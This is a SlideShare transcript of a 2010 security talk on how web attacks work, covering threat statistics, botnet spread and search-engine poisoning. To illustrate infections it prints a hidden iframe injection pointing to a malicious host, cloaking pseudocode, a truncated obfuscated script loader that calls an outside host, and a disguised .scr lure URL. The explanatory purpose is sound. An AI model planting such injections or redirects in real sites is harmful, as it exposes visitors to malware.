SlideShare ist ein Scribd-Unternehmen logo

2010-11 The Anatomy of a Web Attack

Raleigh ISSA
Raleigh ISSA

2010-11 The Anatomy of a Web Attack by Dennis Pike, Systems Engineer, Bluecoat Systems

Technologie
1 von 23
Downloaden Sie, um offline zu lesen
The Anatomy of a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
Agenda  State of the Web • Top categories • Top attacks  The Anatomy of a Web Attack • Lures to web threats • Examples  Dynamic Link Analysis 2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Best of the Worst  Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity  Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc. 3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Email vs Social Networking  Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent. 4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Domain: Client% Domain: Client% Noteworthy Items ~Total~: youtube.com: 100% 35.7800 ~Total~: youtube.com: 100.00% 36.28 hotfile.com: 7.427 rapidshare.com: 6.36 Argument for Video (HTTP and Streaming) apple.com: 4.901 hotfile.com: 5.26 ninjacloak.com: 4.205 apple.com: 3.98 rapidshare.com: 4.135 ninjacloak.com: 3.97 megaupload.com: 2.977 megaupload.com: 2.54 googlevideo.com: 2.66 googlevideo.com: 2.33 fbcdn.net: 1.791 fbcdn.net: 1.85 mediafire.com: 1.492 fileserve.com: 1.75 windowsupdate.com: 1.305 playstation.net: 1.74 playstation.net: 1.241 mediafire.com: 1.68 fileserve.com: 1.187 windowsupdate.com: 1.42 4shared.com: 1.031 zshare.net: 0.78 zshare.net: 0.7793 facebook.com: 0.65 dailymotion.com: 0.6476 dailymotion.com: 0.62 google.com: 0.588 4shared.com: 0.6 facebook.com: 0.5764 novamov.com: 0.54 novamov.com: 0.5737 google.com: 0.54 microsoft.com: 0.4747 farmville.com: 0.52 farmville.com: 0.4626 adobe.com: 0.41 video filesharing © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Changing Web Habits Top 10 Categories – 2009 Social Networking WebFilter/WebPulse, 62M+ Users Moved to #1 from #2 position 1. Social Networking Represents 25% of Top10 requests 2. Web Advertisements 3. Search Engines/Portals Web Email 4. Personals/Dating Dropped to #9 from #5 position 5. Pornography Users migrating to social networking 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content Cyber Crime Leverages 9. Web Email Search engine poisoning 10. Illegal/Questionable Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams 6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web Threats Rising Exponentially  2/3 of all known malicious code threats in 1 year (Symantec April’09)  1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky) 7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Distribution Power  Botnet computing power to: Pitch worthless products Hijack online banking accounts Top 5 Steal corporate data Botnets in 2009 Botnet Zeus Koobface B Koobface D Monkif A Clickbot Peak 1,070,000 number 812,000 599,000 of active 506,000 bots 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 2010 8 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
An Invitation to Crime 2 – Program messages user’s friends asking 3 – Anyone who clicks them to click on a link on the link is asked to to a photo or video. enable a media player needed to see the images. Running the file turns the PC into 1 – An automated a bot. program logs on to social network using stolen user 4 – The bot steals the PC credentials. owners logon credentials, starting the cycle again. USA TODAY Research – March 2010 9 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have 10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Multi-Host Pages SPORT 6 Domains 13 Hosts 147 Requests 504 KB 14.5 Seconds 11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Paths to Malware Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware 12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
End User…Infected Site www.inka.com <html> … <iframesrc="http://ho menameregistration. cn/in.cgi?income12" width=1 height=1 style="visibility: homenameregistration.cn/in.cgi?income12 hidden"></iframe><d iv id=“header”> … </html> 13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web 2.0 and Search Engines Forums Blogs Search Wikis WWW Engine View Guestbooks 14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Web 2.0 and Search Engines Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… 15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
16 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
17 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Hijacked Website if (“search engine”) { xdesignstudios.com echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” dir1 } index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js 18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
End User…Search Engine Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> document.write(unes live.js cape('%3C%53%43 %52%49%50%54% 20%20%20%20%6C %61%6E%67%75… http://cracksinside.com/red/gen.js 19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
What just happened? Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… Redirect 20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Recent Examples - VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocument s.com/library/PDF_D ocument21.0255420 10.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr 21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
Recent Examples – Fake Warez 22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
© Blue Coat Systems, Inc. 2010. All Rights Reserved.

Empfohlen

Free website analysis at snoopstat.com
Free website analysis at snoopstat.comFree website analysis at snoopstat.com
Free website analysis at snoopstat.com
MohammadSaifulIslam45
 
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy
 
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing UK: The Future of SEO is Content, Social and PPCiCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing
 
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
Lumen Consulting
 
Getting Social
Getting SocialGetting Social
Getting Social
MatrixMediaFX
 
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
5 Key Questions to answer: Are social recommendation the new Social Media Cur...5 Key Questions to answer: Are social recommendation the new Social Media Cur...
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
Markus Kucborski
 
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Lumen Consulting
 
Shepherding client & brand reputations: crisis management using social media
Shepherding client & brand reputations: crisis management using social mediaShepherding client & brand reputations: crisis management using social media
Shepherding client & brand reputations: crisis management using social media
Shael Sharma
 

Empfohlen

Free website analysis at snoopstat.com
Free website analysis at snoopstat.comFree website analysis at snoopstat.com
Free website analysis at snoopstat.com
MohammadSaifulIslam45
 
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy London - The future of SEO is Content, Social and PPC Mark Iremonge...
iStrategy
 
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing UK: The Future of SEO is Content, Social and PPCiCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing UK: The Future of SEO is Content, Social and PPC
iCrossing
 
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
12.10.09 Lumen & CEMA Webinar: Leveraging Social Media to Drive Better Attend...
Lumen Consulting
 
Getting Social
Getting SocialGetting Social
Getting Social
MatrixMediaFX
 
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
5 Key Questions to answer: Are social recommendation the new Social Media Cur...5 Key Questions to answer: Are social recommendation the new Social Media Cur...
5 Key Questions to answer: Are social recommendation the new Social Media Cur...
Markus Kucborski
 
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Exhibitor2010 Lumen Consulting Leveraging Social Media To Drive Better Engage...
Lumen Consulting
 
Shepherding client & brand reputations: crisis management using social media
Shepherding client & brand reputations: crisis management using social mediaShepherding client & brand reputations: crisis management using social media
Shepherding client & brand reputations: crisis management using social media
Shael Sharma
 
Securing the Human (人を守るセキュリティ)
Securing the Human (人を守るセキュリティ)Securing the Human (人を守るセキュリティ)
Securing the Human (人を守るセキュリティ)
itforum-roundtable
 
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Infoblox Cloud Solutions - Cisco Mid-Atlantic User GroupInfoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
NetCraftsmen
 
Bluecoat Services
Bluecoat ServicesBluecoat Services
Bluecoat Services
ChessBall
 
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
Top 5 Reasons To Consider SolarWinds IPAM Over InfobloxTop 5 Reasons To Consider SolarWinds IPAM Over Infoblox
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
SolarWinds
 
DNS Security Threats and Solutions
DNS Security Threats and SolutionsDNS Security Threats and Solutions
DNS Security Threats and Solutions
InnoTech
 
Infoblox Secure DNS Solution
Infoblox Secure DNS SolutionInfoblox Secure DNS Solution
Infoblox Secure DNS Solution
Srikrupa Srivatsan
 
Cyber crime v3
Cyber crime v3Cyber crime v3
Cyber crime v3
Jamison Utter
 
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAMCómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Mundo Contact
 
Content Analysis System and Advanced Threat Protection
Content Analysis System and Advanced Threat ProtectionContent Analysis System and Advanced Threat Protection
Content Analysis System and Advanced Threat Protection
Blue Coat
 
Advanced Threat Protection - Sandboxing 101
Advanced Threat Protection - Sandboxing 101Advanced Threat Protection - Sandboxing 101
Advanced Threat Protection - Sandboxing 101
Blue Coat
 
Advanced DNS Protection
Advanced DNS ProtectionAdvanced DNS Protection
Advanced DNS Protection
Srikrupa Srivatsan
 
DNS Security Presentation ISSA
DNS Security Presentation ISSADNS Security Presentation ISSA
DNS Security Presentation ISSA
Srikrupa Srivatsan
 
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Carles Ventura
 
Risk and reward 220410
Risk and reward 220410Risk and reward 220410
Risk and reward 220410
TWO Social
 
Free lowcost dec2010
Free lowcost dec2010Free lowcost dec2010
Free lowcost dec2010
Highway T
 
Risk & Reward in Social Media
Risk & Reward in Social MediaRisk & Reward in Social Media
Risk & Reward in Social Media
Richard Spencer
 
Risk & Reward In Social Media
Risk & Reward In Social MediaRisk & Reward In Social Media
Risk & Reward In Social Media
TWO Social
 
Riskrewardinsocialmedia
RiskrewardinsocialmediaRiskrewardinsocialmedia
Riskrewardinsocialmedia
Jimi1032
 
Measuring adblockers impact on site performance
Measuring adblockers impact on site performanceMeasuring adblockers impact on site performance
Measuring adblockers impact on site performance
Karan Kumar
 
Creating Value In Social Networking
Creating Value In Social NetworkingCreating Value In Social Networking
Creating Value In Social Networking
Lars Trieloff
 
Panda vs Penguin Presentation
Panda vs Penguin PresentationPanda vs Penguin Presentation
Panda vs Penguin Presentation
Aman Talwar
 
RioInfo 2007 - Tecnologias Centradas no Usuário
RioInfo 2007 - Tecnologias Centradas no UsuárioRioInfo 2007 - Tecnologias Centradas no Usuário
RioInfo 2007 - Tecnologias Centradas no Usuário
Manoel Lemos
 

Weitere ähnliche Inhalte

Andere mochten auch

Bluecoat Services
Bluecoat ServicesBluecoat Services
Bluecoat Services
ChessBall
 

Andere mochten auch (12)

Securing the Human (人を守るセキュリティ)
Securing the Human (人を守るセキュリティ)Securing the Human (人を守るセキュリティ)
Securing the Human (人を守るセキュリティ)
 
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Infoblox Cloud Solutions - Cisco Mid-Atlantic User GroupInfoblox Cloud Solutions - Cisco Mid-Atlantic User Group
Infoblox Cloud Solutions - Cisco Mid-Atlantic User Group
 
Bluecoat Services
Bluecoat ServicesBluecoat Services
Bluecoat Services
 
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
Top 5 Reasons To Consider SolarWinds IPAM Over InfobloxTop 5 Reasons To Consider SolarWinds IPAM Over Infoblox
Top 5 Reasons To Consider SolarWinds IPAM Over Infoblox
 
DNS Security Threats and Solutions
DNS Security Threats and SolutionsDNS Security Threats and Solutions
DNS Security Threats and Solutions
 
Infoblox Secure DNS Solution
Infoblox Secure DNS SolutionInfoblox Secure DNS Solution
Infoblox Secure DNS Solution
 
Cyber crime v3
Cyber crime v3Cyber crime v3
Cyber crime v3
 
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAMCómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
Cómo mejorar la seguridad de los servicios de DNS, DHCP e IPAM
 
Content Analysis System and Advanced Threat Protection
Content Analysis System and Advanced Threat ProtectionContent Analysis System and Advanced Threat Protection
Content Analysis System and Advanced Threat Protection
 
Advanced Threat Protection - Sandboxing 101
Advanced Threat Protection - Sandboxing 101Advanced Threat Protection - Sandboxing 101
Advanced Threat Protection - Sandboxing 101
 
Advanced DNS Protection
Advanced DNS ProtectionAdvanced DNS Protection
Advanced DNS Protection
 
DNS Security Presentation ISSA
DNS Security Presentation ISSADNS Security Presentation ISSA
DNS Security Presentation ISSA
 

Ähnlich wie 2010-11 The Anatomy of a Web Attack

Risk and reward 220410
Risk and reward 220410Risk and reward 220410
Risk and reward 220410
TWO Social
 
Measuring adblockers impact on site performance
Measuring adblockers impact on site performanceMeasuring adblockers impact on site performance
Measuring adblockers impact on site performance
Karan Kumar
 
Why Portability matters (full presentation)
Why Portability matters (full presentation)Why Portability matters (full presentation)
Why Portability matters (full presentation)
Ian Forrester
 
Semantic Web: In Quest for the Next Generation Killer Apps
Semantic Web: In Quest for the Next Generation Killer AppsSemantic Web: In Quest for the Next Generation Killer Apps
Semantic Web: In Quest for the Next Generation Killer Apps
Jie Bao
 

Ähnlich wie 2010-11 The Anatomy of a Web Attack (20)

Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
Informe @CVenturaCAT elaborat per @SocialBro 9 d'Octubre de 2012
 
Risk and reward 220410
Risk and reward 220410Risk and reward 220410
Risk and reward 220410
 
Free lowcost dec2010
Free lowcost dec2010Free lowcost dec2010
Free lowcost dec2010
 
Risk & Reward in Social Media
Risk & Reward in Social MediaRisk & Reward in Social Media
Risk & Reward in Social Media
 
Risk & Reward In Social Media
Risk & Reward In Social MediaRisk & Reward In Social Media
Risk & Reward In Social Media
 
Riskrewardinsocialmedia
RiskrewardinsocialmediaRiskrewardinsocialmedia
Riskrewardinsocialmedia
 
Measuring adblockers impact on site performance
Measuring adblockers impact on site performanceMeasuring adblockers impact on site performance
Measuring adblockers impact on site performance
 
Creating Value In Social Networking
Creating Value In Social NetworkingCreating Value In Social Networking
Creating Value In Social Networking
 
Panda vs Penguin Presentation
Panda vs Penguin PresentationPanda vs Penguin Presentation
Panda vs Penguin Presentation
 
RioInfo 2007 - Tecnologias Centradas no Usuário
RioInfo 2007 - Tecnologias Centradas no UsuárioRioInfo 2007 - Tecnologias Centradas no Usuário
RioInfo 2007 - Tecnologias Centradas no Usuário
 
Moodle Series - Learn Local - Embedding in Moodle
Moodle Series - Learn Local - Embedding in MoodleMoodle Series - Learn Local - Embedding in Moodle
Moodle Series - Learn Local - Embedding in Moodle
 
Make useof file-sharing
Make useof file-sharingMake useof file-sharing
Make useof file-sharing
 
Web 2.0 for Educators
Web 2.0 for EducatorsWeb 2.0 for Educators
Web 2.0 for Educators
 
Creative Commons and Free Stuff to Spice Up Your Training
Creative Commons and Free Stuff to Spice Up Your TrainingCreative Commons and Free Stuff to Spice Up Your Training
Creative Commons and Free Stuff to Spice Up Your Training
 
Why Portability matters (full presentation)
Why Portability matters (full presentation)Why Portability matters (full presentation)
Why Portability matters (full presentation)
 
Semantic Web: In Quest for the Next Generation Killer Apps
Semantic Web: In Quest for the Next Generation Killer AppsSemantic Web: In Quest for the Next Generation Killer Apps
Semantic Web: In Quest for the Next Generation Killer Apps
 
Technology lal
Technology lalTechnology lal
Technology lal
 
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIESUSING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
USING SOCIAL MEDIA IN YOUR COMMUNICATION STRATEGIES
 
Mobile Contents
Mobile ContentsMobile Contents
Mobile Contents
 
10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About Plone10 Things You Probably Didn't Know About Plone
10 Things You Probably Didn't Know About Plone
 

Mehr von Raleigh ISSA

A10 issa d do s 5-2014
A10 issa d do s 5-2014A10 issa d do s 5-2014
A10 issa d do s 5-2014
Raleigh ISSA
 
April 2014 Raleigh ISSA chapter update slides
April 2014 Raleigh ISSA chapter update slidesApril 2014 Raleigh ISSA chapter update slides
April 2014 Raleigh ISSA chapter update slides
Raleigh ISSA
 
2013-07 How to Win with Customers - Keith Pigues
2013-07 How to Win with Customers - Keith Pigues2013-07 How to Win with Customers - Keith Pigues
2013-07 How to Win with Customers - Keith Pigues
Raleigh ISSA
 

Mehr von Raleigh ISSA (20)

Raleigh issa chapter updates-slides-2014-9
Raleigh issa chapter updates-slides-2014-9Raleigh issa chapter updates-slides-2014-9
Raleigh issa chapter updates-slides-2014-9
 
Raleigh issa chapter updates-slides-2014-8
Raleigh issa chapter updates-slides-2014-8Raleigh issa chapter updates-slides-2014-8
Raleigh issa chapter updates-slides-2014-8
 
Raleigh issa chapter updates-slides-2014-7
Raleigh issa chapter updates-slides-2014-7Raleigh issa chapter updates-slides-2014-7
Raleigh issa chapter updates-slides-2014-7
 
Raleigh issa chapter updates-slides-2014-6
Raleigh issa chapter updates-slides-2014-6Raleigh issa chapter updates-slides-2014-6
Raleigh issa chapter updates-slides-2014-6
 
Managing privileged account security
Managing privileged account securityManaging privileged account security
Managing privileged account security
 
A10 issa d do s 5-2014
A10 issa d do s 5-2014A10 issa d do s 5-2014
A10 issa d do s 5-2014
 
Raleigh issa chapter april meeting - managing a security & privacy governan...
Raleigh issa chapter april meeting - managing a security & privacy governan...Raleigh issa chapter april meeting - managing a security & privacy governan...
Raleigh issa chapter april meeting - managing a security & privacy governan...
 
April 2014 Raleigh ISSA chapter update slides
April 2014 Raleigh ISSA chapter update slidesApril 2014 Raleigh ISSA chapter update slides
April 2014 Raleigh ISSA chapter update slides
 
March 2014 B2B - Breaking into info sec
March 2014 B2B - Breaking into info secMarch 2014 B2B - Breaking into info sec
March 2014 B2B - Breaking into info sec
 
March 2014 Raleigh ISSA chapter update slides
March 2014 Raleigh ISSA chapter update slidesMarch 2014 Raleigh ISSA chapter update slides
March 2014 Raleigh ISSA chapter update slides
 
February 2014 Raleigh Chapter ISSA Board update slides
February 2014 Raleigh Chapter ISSA Board update slidesFebruary 2014 Raleigh Chapter ISSA Board update slides
February 2014 Raleigh Chapter ISSA Board update slides
 
2014-01 Raleigh ISSA Chapter Updates January 2014
2014-01 Raleigh ISSA Chapter Updates January 20142014-01 Raleigh ISSA Chapter Updates January 2014
2014-01 Raleigh ISSA Chapter Updates January 2014
 
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
Growing trend of finding2013-11 Growing Trend of Finding Regulatory and Tort ...
 
2013-11 Raleigh ISSA Chapter Updates November 2013
2013-11 Raleigh ISSA Chapter Updates November 20132013-11 Raleigh ISSA Chapter Updates November 2013
2013-11 Raleigh ISSA Chapter Updates November 2013
 
2013-10 Raleigh ISSA Chapter Updates October 2013
2013-10 Raleigh ISSA Chapter Updates October 20132013-10 Raleigh ISSA Chapter Updates October 2013
2013-10 Raleigh ISSA Chapter Updates October 2013
 
2013-09 Raleigh ISSA Chapter Updates September 2013
2013-09 Raleigh ISSA Chapter Updates September 20132013-09 Raleigh ISSA Chapter Updates September 2013
2013-09 Raleigh ISSA Chapter Updates September 2013
 
2013-08 Raleigh ISSA Chapter Updates August 2013
2013-08 Raleigh ISSA Chapter Updates August 20132013-08 Raleigh ISSA Chapter Updates August 2013
2013-08 Raleigh ISSA Chapter Updates August 2013
 
2013-07 How to Win with Customers - Keith Pigues
2013-07 How to Win with Customers - Keith Pigues2013-07 How to Win with Customers - Keith Pigues
2013-07 How to Win with Customers - Keith Pigues
 
2013-07 Raleigh ISSA Chapter Updates July 2013
2013-07 Raleigh ISSA Chapter Updates July 20132013-07 Raleigh ISSA Chapter Updates July 2013
2013-07 Raleigh ISSA Chapter Updates July 2013
 
2013-06 Raleigh ISSA Chapter Updates June 2013
2013-06 Raleigh ISSA Chapter Updates June 20132013-06 Raleigh ISSA Chapter Updates June 2013
2013-06 Raleigh ISSA Chapter Updates June 2013
 

Kürzlich hochgeladen

Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Roshan Dwivedi
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 

Kürzlich hochgeladen (20)

🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
